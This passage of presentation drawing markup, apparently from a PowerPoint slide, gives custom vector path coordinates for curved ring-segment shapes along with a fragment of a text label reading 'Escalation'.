                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2713024" y="2291423"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2688209" y="2331859"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2662034" y="2371331"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2634538" y="2409774"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2605748" y="2447175"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2575699" y="2483497"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2544419" y="2518714"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2511945" y="2552776"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2478316" y="2585669"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2443556" y="2617343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2407691" y="2647785"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2370772" y="2676944"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2332812" y="2704795"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2293848" y="2731300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2253919" y="2756433"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2213064" y="2780157"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2171293" y="2802445"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2128659" y="2823260"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2085187" y="2842577"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2040902" y="2860344"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1995855" y="2876537"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1950059" y="2891129"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1903552" y="2904096"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1856384" y="2915374"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1856384" y="2963126"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1904619" y="2952153"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1952180" y="2939504"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1999030" y="2925203"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2045131" y="2909290"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2090458" y="2891790"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2134984" y="2872740"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2178672" y="2852166"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2221484" y="2830106"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2263394" y="2806598"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2304377" y="2781655"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2344394" y="2755328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2383421" y="2727642"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2421407" y="2698635"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2458351" y="2668320"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2494191" y="2636748"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2528913" y="2603944"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2562479" y="2569934"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2594864" y="2534755"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2626042" y="2498445"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2655963" y="2461031"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2684602" y="2422550"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2711932" y="2383028"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2737929" y="2342489"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2762542" y="2300973"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2785757" y="2258517"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2807525" y="2215159"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2827832" y="2170912"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2846641" y="2125815"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2863913" y="2079891"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2879636" y="2033193"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2893745" y="1985746"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2906242" y="1937575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2917088" y="1888705"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="3159759" h="3211195">
                <a:moveTo>
                  <a:pt x="2917088" y="1324825"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2906242" y="1275829"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2893745" y="1227531"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2879636" y="1179944"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2863913" y="1133106"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2846641" y="1087069"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2827832" y="1041844"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2807525" y="997470"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2785757" y="953985"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2762542" y="911415"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2737929" y="869784"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2711932" y="829132"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2684602" y="789495"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2655963" y="750912"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2626042" y="713384"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2594864" y="676973"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2562479" y="641705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2528913" y="607606"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2494191" y="574700"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2458351" y="543039"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2421407" y="512648"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2383421" y="483552"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2344394" y="455790"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2304377" y="429387"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2263394" y="404380"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2221484" y="380796"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2178672" y="358673"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2134984" y="338048"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2090458" y="318935"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2045131" y="301383"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1999030" y="285419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1952180" y="271068"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1904619" y="258381"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1856384" y="247357"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1856384" y="295236"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1903552" y="306565"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1950059" y="319570"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1995855" y="334213"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2040902" y="350456"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2085187" y="368287"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2128659" y="387654"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2171293" y="408533"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2213064" y="430885"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2253919" y="454672"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2293848" y="479882"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2332812" y="506476"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2370772" y="534403"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2407691" y="563651"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2443556" y="594169"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2478316" y="625944"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2511958" y="658926"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2544419" y="693089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2575699" y="728395"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2605748" y="764819"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2634538" y="802335"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2662034" y="840892"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2688209" y="880465"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2713024" y="921016"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2736456" y="962520"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2758452" y="1004951"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2779014" y="1048258"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2798076" y="1092415"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2815615" y="1137386"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2831617" y="1183157"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2846019" y="1229677"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2858820" y="1276908"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2869971" y="1324825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2917088" y="1324825"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="3159759" h="3211195">
                <a:moveTo>
                  <a:pt x="3159544" y="1582407"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3158185" y="1535226"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3155442" y="1488097"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3151352" y="1441056"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3145891" y="1394129"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3139059" y="1347343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3130867" y="1300759"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3121304" y="1254391"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3110382" y="1208278"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3098088" y="1162443"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3084436" y="1116939"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3069412" y="1071791"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3053016" y="1027023"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3035262" y="982687"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3016148" y="938796"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2995663" y="895413"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2973806" y="852538"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2950591" y="810234"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2926016" y="768515"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2900070" y="727417"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2860700" y="767295"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2886138" y="808977"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2910179" y="851255"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2932798" y="894118"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2954007" y="937514"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2973794" y="981417"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2992170" y="1025791"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3009138" y="1070597"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3024695" y="1115822"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3038830" y="1161402"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3051556" y="1207312"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3062871" y="1253515"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3072765" y="1299984"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3081248" y="1346682"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3088309" y="1393571"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3093974" y="1440611"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3098215" y="1487779"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3101035" y="1535036"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3102457" y="1582343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3102457" y="1629676"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3101035" y="1676984"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3098215" y="1724240"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3093974" y="1771408"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3088309" y="1818449"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3081248" y="1865337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3072765" y="1912035"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3062871" y="1958505"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3051556" y="2004707"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3038830" y="2050618"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3024695" y="2096198"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3009138" y="2141423"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2992170" y="2186228"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2973794" y="2230602"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2954007" y="2274506"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2932798" y="2317902"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2910179" y="2360765"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2886138" y="2403043"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2860700" y="2444712"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2900070" y="2484590"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2926016" y="2443505"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2950591" y="2401786"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2973806" y="2359482"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2995663" y="2316607"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3016148" y="2273223"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3035262" y="2229332"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3053016" y="2184997"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3069412" y="2140229"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3084436" y="2095080"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3098088" y="2049576"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3110382" y="2003742"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3121304" y="1957628"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3130867" y="1911261"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3139059" y="1864677"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3145891" y="1817890"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3151352" y="1770964"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3155442" y="1723923"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3158185" y="1676793"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3159544" y="1629613"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3159544" y="1582407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398889" y="5691327"/>
            <a:ext cx="13360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Escalation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442807" y="4204245"/>
            <a:ext cx="3161665" cy="3211195"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3161665" h="3211195">
                <a:moveTo>
                  <a:pt x="298856" y="767295"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="259486" y="727417"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="233527" y="768515"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="208953" y="810234"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185737" y="852538"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="163880" y="895413"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="143395" y="938796"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="124282" y="982687"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="106527" y="1027023"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90131" y="1071791"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="75107" y="1116939"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="61455" y="1162443"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="49161" y="1208278"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38239" y="1254391"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28676" y="1300759"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20485" y="1347343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13652" y="1394129"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8191" y="1441056"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4102" y="1488097"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1358" y="1535226"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1582407"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1629613"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1358" y="1676793"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4102" y="1723923"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8191" y="1770964"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13652" y="1817890"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20485" y="1864677"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28676" y="1911261"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38239" y="1957628"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="49161" y="2003742"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="61455" y="2049576"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="75107" y="2095080"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90131" y="2140229"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="106527" y="2184997"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="124282" y="2229332"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="143395" y="2273223"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="163880" y="2316607"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185737" y="2359482"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="208953" y="2401786"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="233527" y="2443505"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="259486" y="2484590"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="298856" y="2444712"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="273405" y="2403043"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="249364" y="2360765"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="226745" y="2317902"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="205536" y="2274506"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185750" y="2230602"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="167373" y="2186228"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="150406" y="2141423"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134848" y="2096198"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120713" y="2050618"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107988" y="2004707"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="96672" y="1958505"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="86779" y="1912035"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="78295" y="1865337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71234" y="1818449"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="65570" y="1771408"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="61328" y="1724240"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="58508" y="1676984"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57086" y="1629676"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57086" y="1582343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="58508" y="1535036"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="61328" y="1487779"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="65570" y="1440611"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71234" y="1393571"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="78295" y="1346682"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="86779" y="1299984"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="96672" y="1253515"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107988" y="1207312"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120713" y="1161402"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134848" y="1115822"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="150406" y="1070597"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="167373" y="1025791"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185750" y="981417"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="205536" y="937514"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="226745" y="894118"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="249364" y="851255"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="273405" y="808977"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="298856" y="767295"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="3161665" h="3211195">
                <a:moveTo>
                  <a:pt x="1303172" y="2915374"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1256042" y="2904096"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1209598" y="2891129"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1163866" y="2876537"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1118882" y="2860344"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1074661" y="2842577"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1031252" y="2823260"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="988669" y="2802445"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="946975" y="2780157"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="906170" y="2756433"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="866305" y="2731300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="827405" y="2704795"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="789508" y="2676944"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="752640" y="2647785"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="716826" y="2617343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="682129" y="2585669"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="648538" y="2552776"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="616127" y="2518714"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="584898" y="2483497"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="554901" y="2447175"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="526161" y="2409774"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="498703" y="2371331"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="472579" y="2331859"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="447802" y="2291423"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="424408" y="2250033"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="402437" y="2207717"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="381927" y="2164537"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="362889" y="2120493"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="345376" y="2075637"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="329399" y="2030006"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="315010" y="1983613"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="302234" y="1936508"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="291109" y="1888705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="243992" y="1888705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="254812" y="1937575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267284" y="1985746"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="281393" y="2033193"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="297078" y="2079891"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="314337" y="2125815"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="333121" y="2170912"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="353390" y="2215159"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="375145" y="2258517"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="398322" y="2300973"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="422897" y="2342489"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="448856" y="2383028"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="476148" y="2422550"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="504748" y="2461031"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="534619" y="2498445"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="565746" y="2534755"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="598081" y="2569934"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="631609" y="2603944"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="666280" y="2636748"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="702068" y="2668320"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="738949" y="2698635"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="776884" y="2727642"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="815848" y="2755328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="855814" y="2781655"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="896734" y="2806598"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="938580" y="2830106"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="981341" y="2852166"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1024953" y="2872740"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1069416" y="2891790"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1114679" y="2909290"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1160716" y="2925203"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1207503" y="2939504"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1254988" y="2952153"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1303172" y="2963126"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1303172" y="2915374"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="3161665" h="3211195">
                <a:moveTo>
                  <a:pt x="1303172" y="247357"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1254988" y="258381"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1207503" y="271068"/>
